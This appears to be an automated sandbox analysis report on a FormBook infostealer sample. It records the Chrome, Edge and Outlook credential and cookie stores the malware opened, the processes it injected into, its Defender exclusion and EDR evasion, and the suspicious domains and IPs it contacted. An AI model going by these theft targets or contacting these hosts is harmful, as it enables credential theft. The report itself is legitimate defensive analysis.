                Source: Yara matchFile source: 00000008.00000002.3292767539.0000000004AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.998384257.0000000002690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3290872788.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.990094154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3290778849.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3290725167.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3288875125.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.992572744.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3292767539.0000000004AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.998384257.0000000002690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3290872788.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		11
                Masquerading                		1
                OS Credential Dumping                		131
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		51
                Virtualization/Sandbox Evasion                		Security Account Manager51
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials123
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640362 Sample: mKv3sKQ5Q4E7waF.exe Startdate: 17/03/2025 Architecture: WINDOWS Score: 100 46 www.quantumxr.xyz 2->46 48 www.lingkungan.xyz 2->48 50 17 other IPs or domains 2->50 60 Antivirus detection for URL or domain 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 Yara detected FormBook 2->64 68 4 other signatures 2->68 10 mKv3sKQ5Q4E7waF.exe 4 2->10         started        14 svchost.exe 1 1 2->14         started        signatures3 66 Performs DNS queries to domains with low reputation 48->66 process4 dnsIp5 38 C:\Users\user\...\mKv3sKQ5Q4E7waF.exe.log, ASCII 10->38 dropped 72 Adds a directory exclusion to Windows Defender 10->72 74 Injects a PE file into a foreign processes 10->74 17 mKv3sKQ5Q4E7waF.exe 10->17         started        20 powershell.exe 23 10->20         started        52 127.0.0.1 unknown unknown 14->52 file6 signatures7 process8 signatures9 54 Maps a DLL or memory area into another process 17->54 22 vnV7v1GankdEyS2eDT.exe 17->22 injected 56 Loading BitLocker PowerShell Module 20->56 25 WmiPrvSE.exe 20->25         started        27 conhost.exe 20->27         started        process10 signatures11 70 Found direct / indirect Syscall (likely to bypass EDR) 22->70 29 help.exe 13 22->29         started        process12 signatures13 76 Tries to steal Mail credentials (via file / registry access) 29->76 78 Tries to harvest and steal browser information (history, passwords, etc) 29->78 80 Modifies the context of a thread in another process (thread injection) 29->80 82 3 other signatures 29->82 32 vnV7v1GankdEyS2eDT.exe 29->32 injected 36 firefox.exe 29->36         started        process14 dnsIp15 40 www.lingkungan.xyz 13.248.169.48, 52864, 52865, 52866 AMAZON-02US United States 32->40 42 www.klass.team 77.222.42.122, 52914, 52915, 52916 SWEB-ASRU Russian Federation 32->42 44 11 other IPs or domains 32->44 58 Found direct / indirect Syscall (likely to bypass EDR) 32->58 signatures16

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.